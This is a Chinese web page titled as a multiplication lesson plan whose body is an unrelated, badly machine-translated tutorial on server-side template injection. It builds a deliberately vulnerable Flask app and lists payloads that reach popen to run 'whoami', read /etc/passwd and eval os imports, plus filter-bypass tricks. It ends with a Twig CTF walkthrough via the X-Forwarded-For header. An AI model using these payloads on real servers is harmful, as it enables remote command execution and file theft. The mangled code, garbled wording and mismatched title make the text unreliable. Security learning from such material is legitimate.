《乘法的初步认识》教案,乘法的初步认识 优秀教案

  《乘法的初步认识》教案,乘法的初步认识 优秀教案

  SSTI SSTI简介,即服务器端模板注入,是由于服务器接收到用户的输入,将其作为Web应用模板内容的一部分,在目标编译渲染过程中执行用户插入的恶意内容,从而导致各种问题。

  Python SSTI(flask)首先我们来写一个简单的flask(说到SSTI就想到flask框架)。由于我使用pycharm,所以我可以直接创建一个项目。

  app.py代码如下:

  from flask导入Flask#flask需要安装FROM FLASK导入Render _ Template FROM FLASK导入请求APP=Flask(_ _ name _ _)@ APP . route(/,methods=[get ,Post]) def hello _ world():返回render _ template (index.html ,title= home ,user=REQUEST . args . get( key ))if _ _ name _ _= _ _ main _ :APP . run()。

  用模板编写index.html文件,如下所示:(模板文件夹是渲染文件的位置)

  !doctype HTML HTML lang= en headmethacharaset= UTF-8 title这是一个测试/title/head body h1你好。此时运行即可获得{{user}}/h1/body/html。

  打开127.0.0.1:5000,传入参数key={{2*3}}可以看到:

  此时未执行,因为模板呈现失控。然而,当我们把app.py

  Hello _ world():返回render _ template (index.html ,title= home ,user=request.args.get (key ))替换为

  def hello _ world():code=request . args . get( id )template= div class= center-content error h1Oops!那个页面不存在。/h1 H3 % s/H3/div %(code)return render _ template _ string(template)在这一点上,问题就大了,因为它直接将变量的内容作为字符串输出,会产生以下结果:

  如你所见,它直接计算id。我们可以进行模板注射。

  这里我们需要知道python中的一些特殊类:

  __class__#返回调用的参数类型。__base__#返回基类__mro__#允许我们跟踪继承树_ _ subclass _ _()#返回当前Python环境中的子类。在flask ssti中,poc的很大一部分是从object类(object类是所有类的基类)中找到我们可以利用的类的方法,比如最简单的payload 。_ _ class _ _。_ _ bases _ _ [0]。_ _子类_ _ () [133]。_ _ init _ _。_ _ globals _ _ [popen] (dir )。Read()是使用。__class__返回了类“str”。__class__。bases _ _返回(类“object”,)。_ _ class _ _。_ _ bases _ _ [0]。_ _ subclass _ _返回所有类。_ _ class _ _。_ _ bases _ _ [0]。_ _ subclass _ _[133]返回类的操作系统。_wrap_close

  __init__用于初始化该类。

  __globals__是全局的,用于查找所有方法、变量和参数。

  使用__globals__[popen]调用popen方法。

  以下是一些有效载荷:

  读/写文件:

  []._ _ class _ _。碱基_ _ [0]。_ _子类_ _ () [40] (/etc/passwd )。read()。_ _ class _ _。碱基_ _ [0]。_ _子类_

  .__class__。__bases__[0]。__子类__()[59]。__init__。func _ globals . line cache . OS . popen( whoami )。读取()“”。__class__。碱基__[0]。__子类__()[59]。_ _ init _ _。_ _ Globals _ _[ _ _ Builtins _ _ ][ eval ]( _ _ import _ _( OS )。Popen (whoami )。读取()“”。_ _ class _ _ _.

  过滤关键词后,可以使用拼接法。比如过滤掉全局之后,可以用‘GLO’和‘bals’。过滤掉括号后,就可以使用__getitem__,原来是:“”。__class__。__mro__[2]可以替换为“”。_ _ class _ _。_ mro _ _。getitem _ _ (2)来过滤{{}},并且可以使用{还有其他技能和有效载荷。可以看P大师的:https://p0sec.net/index.php/archives/120/.

  参考文章:

  https://xz.aliyun.com/t/3679

  https://www.cnblogs.com/hackxf/p/10480071.html

  PHP SSTI(Twig)我就直奔主题了,【bjdctf 2020】IP的奥秘,因为我对PHP了解的比较多,而且很简单,基本上一眼就能看懂。按照流程走就行了。

  打开标题,看到标志页,点进去,发现会显示IP:

  考虑XFF头或referer头。测试后发现是XFF头:

  试验后,发现SSTI注射液:

  执行PHP代码:

  获取标志。

  值得注意的是,在SSTI,陈述不需要分号。

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

留言与评论(共有 条评论)
   
验证码: